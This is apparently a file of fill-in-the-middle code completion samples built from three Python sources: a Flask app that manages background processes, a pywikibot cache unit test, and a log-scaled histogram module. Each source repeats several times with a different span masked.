<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def <|fim_middle|>():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | root |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def <|fim_middle|>():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | kill |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def <|fim_middle|>():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | kill_all |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def <|fim_middle|>():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | active |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def <|fim_middle|>():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | start |
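Once one of the test.py variants above is running, its routes can be exercised from another shell; a small driver, assuming the third-party requests package and Flask's default development host and port:

import requests

base = 'http://127.0.0.1:5000'  # assumed Flask development default
print(requests.get(base + '/start').text)     # spawn the daemonized worker
print(requests.get(base + '/active').text)    # PIDs from multiprocessing.active_children()
print(requests.get(base + '/kill_all').text)  # terminate every child process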
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()<|fim▁end|> | """API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014 |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
<|fim_middle|>
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | """Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry) |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
<|fim_middle|>
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | """Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object. |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
<|fim_middle|>
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | """Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry) |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
<|fim_middle|>
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | self.assertIsNotNone(entry.site._username[0]) |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
<|fim_middle|>
<|fim▁end|> | unittest.main() |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def <|fim_middle|>(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | _check_cache_entry |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def <|fim_middle|>(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | test_cache |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)<|fim▁hole|> self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]<|fim▁end|> | |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
<|fim_middle|>
<|fim▁end|> | r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)] |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
<|fim_middle|>
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale' |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
<|fim_middle|>
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls) |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
<|fim_middle|>
<|fim▁end|> | r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)] |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
<|fim_middle|>
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | low.insert(0, 0.0)
high.insert(0, 1.0) |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
<|fim_middle|>
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | low.insert(0, self.data_vector[0])
high.insert(0, 0.0) |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def <|fim_middle|>(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def _add_subparser(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | __init__ |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
based on the supplied scale factor. If there are negative values then
the first bin contains everything below 0, the next bin will contain
everything between 0 and 1.
kwargs include:
scale_fact - numeric value to generate axis scale for bins. A
scale fact of 10 creates bins: 0-1, 1-10, 10-100, etc.
"""
def __init__(self, field, **kwargs):
super().__init__(field)
self.args.update(kwargs)
self.output_key = 'hist_logscale'
self.action = 'histogram_logscale'
@classmethod
def <|fim_middle|>(cls, subparsers, parent):
r"""
Adds a specific action based sub-parser to the supplied arg_parser
instance.
"""
parser = subparsers.add_parser(cls.__name__,
aliases=['histlog'],
parents=[parent],
help=cls.__doc__)
#
parser.add_argument('scale_fact', type=float, nargs='?', default=10.0,
help='base to generate logscale from')
parser.set_defaults(func=cls)
def define_bins(self, **kwargs):
r"""
This defines the bins for a logscaled histogram
"""
self.data_vector.sort()
sf = self.args['scale_fact']
num_bins = int(sp.logn(sf, self.data_vector[-1]) + 1)
#
# generating initial bins from 1 - sf**num_bins
low = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[:-1]
high = list(sp.logspace(0, num_bins, num_bins + 1, base=sf))[1:]
#
# Adding "catch all" bins for anything between 0 - 1 and less than 0
if self.data_vector[0] < 1.0:
low.insert(0, 0.0)
high.insert(0, 1.0)
if self.data_vector[0] < 0.0:
low.insert(0, self.data_vector[0])
high.insert(0, 0.0)
#
self.bins = [bin_ for bin_ in zip(low, high)]
<|fim▁end|> | _add_subparser |
<|file_name|>histogram_logscale.py<|end_file_name|><|fim▁begin|>"""
================================================================================
Logscaled Histogram
================================================================================
| Calculates a logarithmically spaced histogram for a data map.
| Written By: Matthew Stadelman
| Date Written: 2016/03/07
| Last Modified: 2016/10/20
"""
import scipy as sp
from .histogram import Histogram
class HistogramLogscale(Histogram):
r"""
Performs a histogram where the bin limits are logarithmically spaced
